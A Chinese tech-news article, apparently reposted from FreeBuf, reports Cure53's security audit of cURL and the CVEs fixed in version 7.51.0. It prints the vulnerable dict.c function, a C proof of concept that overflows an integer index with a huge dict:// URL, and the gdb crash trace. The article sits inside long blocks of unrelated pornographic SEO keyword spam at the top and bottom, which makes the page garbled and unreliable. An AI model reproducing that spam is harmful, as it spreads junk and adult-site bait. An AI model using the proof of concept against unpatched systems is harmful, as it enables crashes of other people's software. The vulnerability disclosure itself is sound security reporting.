精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

注意了,cURL的漏洞也不少

安全 漏洞
cURL想必大家都不陌生,它是一款開源的命令行工具和庫,支持多種協議傳輸數據。cURL如今的應用還是比較廣泛的,包括網絡設備、打印機、智能手機,甚至是一些物聯網設備比如汽車。

[[177943]]

安全專家對cURL進行了審計,發現了數十個安全問題,這些漏洞在最新的版本中已經被修復。

cURL想必大家都不陌生,它是一款開源的命令行工具和庫,支持多種協議傳輸數據。cURL如今的應用還是比較廣泛的,包括網絡設備、打印機、智能手機,甚至是一些物聯網設備比如汽車。

主動審計

前不久,cURL開發者、Mozilla員工Daniel Stenberg請Mozilla Secure Open Source(SOS)項目對cURL進行安全審計。

“我請Mozilla Secure Open Source項目進行了一次安全審計。這個項目是由Mozilla尋找第三方公司一起參與,并且最終買單完成的。參與審計的公司名為Cure53。” Stenberg在博客中寫道。“我之所以申請審計是因為最近我感覺存在一些安全相關的問題,我覺得我們在安全方面可能有所欠缺,所以想讓專家們檢查一下。”

Cure53的5名專家對cURL進行了為期20天的審計,發現了總共23個安全問題。

審計結果

這些安全問題中,有9個是安全漏洞。專家融合了其中2個安全漏洞——其中一個被歸類為“plain bug”,因為要在實際攻擊場景進行利用會很困難。另外,審計發現了4個高危漏洞和4個中危漏洞。

高危漏洞的漏洞編號為CVE-2016-8617, CVE-2016-8619, CVE-2016-8622和CVE-2016-8623。這些都是遠程執行漏洞。

比如說下面這個漏洞:

CRL-01-014 unescape_word()整型溢出造成負數數組索引(高危)

dict.c中的unescape_word()函數中存在以下代碼:

  1. static char *unescape_word(struct Curl_easy *data, const char *inputbuff) 
  2.        { 
  3.          char *newp; 
  4.          char *dictp; 
  5.          char *ptr; 
  6.          int len; 
  7.          char ch; 
  8.          int olen=0; 
  9.          newp = curl_easy_unescape(data, inputbuff, 0, &len); 
  10.          if(!newp) 
  11. return NULL
  12.          dictp = malloc(((size_t)len)*2 + 1); /* add one for terminating zero */ 
  13.          if(dictp) { 
  14.            /* According to RFC2229 section 2.2, these letters need to be escaped with 
  15.               \[letter] */ 
  16.            for(ptr = newp; 
  17.                (ch = *ptr) != 0; 
  18.                ptr++) { 
  19.              if((ch <= 32) || (ch == 127) || 
  20.                  (ch == '\'') || (ch == '\"') || (ch == '\\')) { 
  21.                dictp[olen++] = '\\'
  22.              } 
  23.              dictp[olen++] = ch; 
  24.            } 
  25.            dictp[olen]=0; 
  26.          } 
  27. free(newp); 
  28.          return dictp; 
  29.        } 

很明顯,len要比pow(2,31)小,但是輸出可以拓展至兩倍大小,也就是說當olen的值是INT_MAX時,可以被增加。這就會導致有符號整型溢出。

由于olen一直被用作數組索引,負的數組索引就會指向未分配的內存。

要驗證漏洞,可以在6GB以上空閑內存的64位電腦上運行下面的代碼。這個測試會獲取一個超過1GB長的dict:// URL。

  1. #include <curl/curl.h> 
  2. #include <stdint.h> 
  3. #include <string.h> 
  4. #include <err.h> 
  5. #include <stdlib.h> 
  6. int main(int argc, char *argv[]) 
  7.   char *dicturl = malloc(23 + (1ULL<<30) + 5 + 1); 
  8.   if (!dicturl) 
  9.     errx(1, "malloc"); 
  10.   strcpy(dicturl, "dict://localhost/MATCH:"); 
  11.   memset(dicturl + 23, '\"', (1ULL<<30) + 5); 
  12.   dicturl[23 + (1ULL<<30) + 5] = '\0'
  13.   CURL *hnd = curl_easy_init(); 
  14.   curl_easy_setopt(hnd, CURLOPT_URL, dicturl); 
  15.   free(dicturl); 
  16.   curl_easy_setopt(hnd, CURLOPT_NOPROGRESS, 1L); 
  17.   CURLcode ret = curl_easy_perform(hnd); 
  18.   curl_easy_cleanup(hnd); 
  19.   return (int)ret; 

運行會導致如下的崩潰信息:

  1. $ gdb ./negative_dict_url 
  2. [...] 
  3. (gdb) run 
  4. Starting program: [...] 
  5. [...] 
  6. Program received signal SIGSEGV, Segmentation fault. 
  7. 0x00007ffff7b6975b in unescape_word (data=0x63a0b0, inputbuff=0x7fffb0fca017 '\"' <repeats 200 times>...) at dict.c:116 
  8. 116 dictp[olen++] = '\\'
  9. (gdb) x/1i $pc 
  10. => 0x7ffff7b6975b <unescape_word+170>: mov 
  11. (gdb) print/x $rax 
  12. $1 = 0x7ffdf0dba010 
  13. (gdb) print/x dictp 
  14. $2 = 0x7ffe70dba010 
  15. (gdb) print olen 
  16. $3 = -2147483647 

但實際上,審計報告提到,cURL庫的整體安全性和魯棒性都很好。

也請大家不要擔心,新版本的cURL已經上線了,7.51.0版本修復了總共11個漏洞,其中7個是由Cure53的審計團隊發現的,其他的漏洞是由Luật Nguyễn、Christian Heimes和Fernando Muñoz提交的。

Stenberg指出,cURL是一個非常常用的軟件,因此,審計對用戶來說具有重大意義。

“由于curl是世界上最常用的軟件,因此curl如果出現了問題可能對各種工具、設備、應用造成重大影響。我們不希望發生那樣的事。”

責任編輯:武曉燕 來源: FreeBuf
相關推薦

2021-12-26 19:04:51

漏洞Logback系統

2015-08-20 15:14:33

Android漏洞Stagefright漏洞修復

2020-12-08 12:18:09

安卓應用漏洞

2018-09-14 09:55:26

2010-08-31 15:18:31

2022-09-15 12:22:25

cookieDOS 漏洞網絡攻擊

2020-11-05 10:43:50

安全漏洞Github

2021-07-07 05:43:47

漏洞網絡安全網絡攻擊

2022-06-20 13:34:46

漏洞網絡攻擊

2009-07-20 15:37:09

iBatis like注入漏洞

2020-10-19 15:52:42

物聯網漏洞IoT

2023-10-10 22:27:42

2021-05-20 15:00:13

手機關機電池

2015-08-10 10:26:08

2014-06-03 10:14:06

2016-01-27 14:30:20

2020-04-21 15:22:35

ChromeFirefox瀏覽器

2019-05-27 22:55:45

GitHub開源贊賞

2022-04-26 16:52:59

漏洞網絡攻擊者谷歌

2022-05-06 14:40:32

漏洞補丁Android
點贊
收藏

51CTO技術棧公眾號

搜索黄色一级片| www.色.com| 阿v免费在线观看| 日韩专区在线视频| 日韩中文字幕不卡视频| 美女被艹视频网站| 无遮挡在线观看| 中文字幕精品一区| 99re在线| 亚洲精品久久久久久久蜜桃| 久久久久久久久丰满| 精品三级在线观看| 欧美伦理片在线观看| 日本一级理论片在线大全| 91麻豆免费观看| 91精品久久久久久久久| 日韩特黄一级片| 色琪琪久久se色| 亚洲国产精久久久久久 | 波兰性xxxxx极品hd| 国产成人tv| 7777精品伊人久久久大香线蕉超级流畅| 91精品国产毛片武则天| 男人的天堂在线免费视频| 国产在线观看一区二区| 人妖精品videosex性欧美| 天天操天天操天天操天天操天天操| 日韩aaa久久蜜桃av| 欧美疯狂性受xxxxx喷水图片| 亚洲自偷自拍熟女另类| 在线中文字幕-区二区三区四区| 久久综合久久综合亚洲| 97超碰人人看人人| 在线视频你懂得| 午夜亚洲视频| 97国产精品免费视频| 人妻人人澡人人添人人爽| 大片网站久久| 国产丝袜精品第一页| 国产91在线免费观看| 巨大黑人极品videos精品| 精品日韩视频在线观看| 正在播放国产精品| a黄色在线观看| 久久蜜臀精品av| 久久精彩视频| 少妇精品视频一区二区 | 色国产综合视频| 一二三四视频社区在线| 日本成人不卡| 亚洲男人天堂一区| 黄色免费高清视频| 国产在线激情| 亚洲天堂精品在线观看| 亚洲视频精品一区| 日本在线观看| 中文字幕一区二区三区色视频| 日韩激情视频| jizz在线观看| 亚洲欧美综合另类在线卡通| 亚洲欧洲日本国产| 日日夜夜精品一区| 国产精品久久久久永久免费观看 | 日本www在线观看| 国产精品亲子乱子伦xxxx裸| 天堂av一区二区| 丝袜美腿美女被狂躁在线观看| 国产欧美一区二区三区沐欲| 日韩高清专区| 色哟哟免费在线观看| 日韩美女视频一区二区| 熟女熟妇伦久久影院毛片一区二区| 香蕉视频免费在线播放| 国产精品国产三级国产普通话三级 | 欧美丰满少妇xxxxx做受| 欧美日韩精品在线观看视频 | 亚洲系列在线观看| 韩国精品久久久| 91丝袜脚交足在线播放| 国产91麻豆视频| 99久久伊人精品| 欧洲一区二区在线| 免费观看久久久久| 亚洲毛片av在线| 国产中文字幕乱人伦在线观看| eeuss鲁一区二区三区| 欧美性猛交xxxx免费看久久久 | 国产乱色国产精品免费视频| 成人一区二区三区四区| 日本私人网站在线观看| 中文字幕欧美三区| 欧美性受黑人性爽| 91超碰在线| 欧美亚洲综合色| 亚洲av无码久久精品色欲| 加勒比视频一区| 亚洲香蕉在线观看| 欧美日韩在线视频免费| 亚洲综合电影一区二区三区| 国产在线精品播放| 熟妇人妻av无码一区二区三区| 国产视频一区二区在线| 日本一级黄视频| 在线成人视屏 | 一级片黄色免费| 亚洲自拍都市欧美小说| 久久精品人人爽| 久久久精品视频网站| 国产精品自拍一区| 日本一区二区高清视频| 日本伦理一区二区| 欧美吞精做爰啪啪高潮| 挪威xxxx性hd极品| 天天久久综合| 国产成人精品a视频一区www| 性一交一乱一乱一视频| 国产精品视频一二| 欧美网站免费观看| 中文字幕一区二区三区中文字幕| 国产一区二区日韩精品欧美精品| 日韩高清免费av| 国产一区二区成人久久免费影院| 欧美极品色图| 99re6在线精品视频免费播放| 91精品国产手机| 久久视频精品在线观看| 亚洲精品系列| 99国产高清| 大片免费在线看视频| 欧美在线观看视频一区二区 | 国产精品色婷婷久久58| 国产精品网站免费| jizz性欧美23| 久久国产精品免费视频| 中文字幕在线观看视频一区| 久久久久久免费网| 日韩av综合在线观看| 无码国模国产在线观看| 日韩亚洲欧美中文在线| 97人妻精品视频一区| 久久伊人中文字幕| 中国丰满人妻videoshd | 神马午夜精品91| 青青草国产精品亚洲专区无| 你懂的网址一区二区三区| 国产调教在线| 日韩av在线看| 国产尤物在线视频| 97久久精品人人爽人人爽蜜臀| 国产一线二线三线女| 88久久精品| 欧美精品www| 秋霞欧美在线观看| 香蕉久久一区二区不卡无毒影院 | 久精品免费视频| www日本高清| 亚洲影视在线观看| 在线免费看黄色片| 亚洲激情社区| 蜜桃999成人看片在线观看| 国产污视频在线播放| 亚洲男女性事视频| 久久这里只有精品9| 国产精品色噜噜| 999热精品视频| 欧美日韩国产高清| 国产欧美日韩综合精品二区| 国产直播在线| 亚洲午夜性刺激影院| 一区二区三区精| 亚洲精品成人a在线观看| 日韩av成人网| 欧美专区18| 亚洲精品影院| 亚洲专区**| 国产91精品黑色丝袜高跟鞋| 男女视频在线观看| 欧美日韩色综合| 美女福利视频在线观看| 99免费精品在线| 天天视频天天爽| 欧美激情成人在线| 久久日韩精品| 国产精品黄色片| 久久久久亚洲精品| 精品视频一二区| 91精品国产综合久久久久久漫画| 精品亚洲永久免费| 国产欧美中文在线| 69久久精品无码一区二区| 一本久道久久综合狠狠爱| 亚洲国产另类久久久精品极度| 深夜激情久久| 国产精品第七十二页| 在线看女人毛片| 亚洲性猛交xxxxwww| 精品欧美在线观看| 色婷婷亚洲精品| 欧美日韩在线视频免费| 久久精品男人的天堂| 亚洲熟妇一区二区| 日本aⅴ免费视频一区二区三区| 国产在线观看欧美| 精品国产一区二区三区| 国产激情美女久久久久久吹潮| 欧美日韩激情电影| 久久久久久亚洲| 男人天堂久久久| 亚洲欧美日韩高清| 亚洲第九十九页| 欧美日韩国产电影| 日韩人妻精品中文字幕| 亚洲精品久久久久久国产精华液| 色一情一交一乱一区二区三区 | 在线欧美小视频| 精品无码人妻一区二区三区| 国产精品国产三级国产有无不卡 | 亚洲精品免费电影| 无码一区二区三区在线| 成人午夜又粗又硬又大| www.污污视频| 日本不卡免费在线视频| 亚洲不卡中文字幕无码| 黄色国产精品| 欧美xxxx吸乳| 国产精品成久久久久| 日本黑人久久| 久草精品在线| 久久精品第九区免费观看| 成人高潮a毛片免费观看网站| 成人欧美在线观看| 99久久久国产精品免费调教网站| 欧美亚洲在线视频| 国产黄大片在线观看| 欧美剧在线观看| 国产淫片在线观看| 色噜噜国产精品视频一区二区| 国产一区二区影视| 亚洲欧美综合区自拍另类| 熟妇高潮一区二区三区| 欧美精品一区二区精品网| av中文字幕第一页| 欧美一区二区在线播放| 一级片免费网站| 3atv在线一区二区三区| 国产精品久久久久久久久久久久久久久久久久 | 国产成人免费av一区二区午夜| 国产精品美女免费| 日本一区免费网站| 国产欧美韩国高清| 色综合视频一区二区三区44| 国产美女被下药99| 日韩欧乱色一区二区三区在线 | 日韩在线黄色| 久久婷婷人人澡人人喊人人爽| 色橹橹欧美在线观看视频高清 | 国内av免费观看| 国产高清久久久久| 国产女主播在线播放| 高清不卡一区二区在线| 美女露出粉嫩尿囗让男人桶| 成人小视频在线观看| 岛国精品资源网站| 久久色.com| 极品久久久久久久| 1区2区3区精品视频| 亚洲综合网在线| 亚洲成人av中文| 欧美一区二区三区网站| 欧美色图免费看| 国产成人精品毛片| 亚洲黄色有码视频| 高清中文字幕一区二区三区| 中文字幕亚洲激情| 在线观看午夜av| 97人人爽人人喊人人模波多 | 亚洲国产av一区| 一区视频在线播放| 国产在线视频在线观看| 色域天天综合网| 亚洲天堂狠狠干| 精品美女被调教视频大全网站| 视频二区在线| 日韩一区二区三区国产| 9999热视频在线观看| 国产精品普通话| 99re6热只有精品免费观看| 久久日韩精品| 欧美黄色aaaa| 中文字幕无码不卡免费视频| 国内精品不卡在线| 国产精品无码电影| 中文字幕在线一区免费| 国产精品成人久久| 欧美无人高清视频在线观看| 亚洲av无码国产精品永久一区 | 成人欧美一区二区三区在线观看| 免费毛片在线不卡| www.18av.com| 天堂va蜜桃一区二区三区 | 欧美亚洲精品天堂| 51午夜精品国产| 九色蝌蚪在线| 久久久久久久久91| 亚洲狼人综合| 免费在线观看91| 亚洲第一在线| 手机av在线网站| 亚洲国产精品激情在线观看| 日韩熟女精品一区二区三区| 制服丝袜在线91| 精品亚洲综合| 91精品国产91久久| 视频二区欧美| 五月天男人天堂| 日韩制服丝袜av| 亚洲永久无码7777kkk| 一区二区三区资源| 一级片在线免费观看视频| 亚洲第一区中文字幕| 日韩三级影院| 国产精品成人一区| 私拍精品福利视频在线一区| 污污污污污污www网站免费| 六月婷婷色综合| 小早川怜子久久精品中文字幕| 亚洲国产日韩av| 国产哺乳奶水91在线播放| 综合久久五月天| 国产精品扒开腿做爽爽爽视频软件| 国精产品一区二区| 狠狠综合久久| 午夜性福利视频| 一区二区高清视频在线观看| 91在线公开视频| 视频直播国产精品| 福利视频亚洲| 亚洲精品成人久久久998| 久久精品导航| 久久久久亚洲av成人无码电影| 欧美日韩国产综合视频在线观看中文| 亚洲国产一二三区| 欧美激情视频免费观看| 亚洲精品18| www成人免费| 国产aⅴ综合色| 九九九国产视频| 亚洲国产精久久久久久 | 亚洲高清影视| 国产又粗又长又爽又黄的视频| 亚洲欧美综合在线精品| 国产精品欧美亚洲| 欧美成人h版在线观看| 精品视频在线观看网站| 少妇一晚三次一区二区三区| 国产成人免费视频网站| 午夜偷拍福利视频| 日韩黄色在线免费观看| 黄瓜视频成人app免费| 视频一区国产精品| 久久精品国产网站| 一区二区三区四区五区| 日韩精品一区二区三区视频在线观看| 少女频道在线观看免费播放电视剧| 99在线影院| 9色精品在线| 香蕉视频久久久| 91麻豆精品国产91久久久久 | 中文字幕第22页| 亚洲一区欧美一区| 天天操天天操天天干| 日av在线播放中文不卡| 欧美黄色大片在线观看| 日韩大尺度视频| 一本一道波多野结衣一区二区| 丁香在线视频| 99久久自偷自偷国产精品不卡| 日韩亚洲精品在线| 微拍福利一区二区| 5858s免费视频成人| 白白色在线观看| 日韩一区二区电影在线观看| 国产在线不卡视频| 在线观看精品国产| 一区二区三区四区精品| 国产精品免费精品自在线观看| 国产精品无码人妻一区二区在线| 久久久久国色av免费看影院| 国产伦精品一区二区三区四区 | 影音先锋成人资源网站| 成人18精品视频| 在线观看中文字幕2021| 久久久久久久久久婷婷| 红桃成人av在线播放| 久久综合在线观看| 欧美日韩在线视频首页| 国产网站在线免费观看| 欧美二区在线| 国产精品一区二区久久不卡 | 丰满大乳少妇在线观看网站|